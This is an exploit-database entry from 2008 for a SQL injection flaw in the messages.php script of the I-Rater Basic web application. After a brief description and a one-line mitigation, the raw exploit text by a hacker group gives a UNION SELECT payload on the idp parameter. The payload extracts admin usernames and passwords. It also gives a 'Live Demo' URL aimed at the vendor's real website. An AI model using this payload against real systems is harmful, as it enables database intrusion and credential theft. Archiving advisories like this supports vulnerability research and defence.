I-Rater Basic(messages.php) SQL-injection

vendor:

I-Rater Basic

by:

boom3rang

7.5

CVSS

HIGH

SQL-injection

CWE

Product Name: I-Rater Basic

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

I-Rater Basic(messages.php) SQL-injection

I-Rater Basic is vulnerable to SQL-injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL-injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################

###################################################
#[~] Author :  boom3rang 
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.


#[!] Script Name: I-Rater Basic
#[!] Home Page:  http://www.i-rater.com
#[!] Google_Dork:  N/A
###################################################





#[~] Example:  
http://localhost/Path/messages.php?idp=[exploit]

#[~]Exploit:  
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--


#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-18]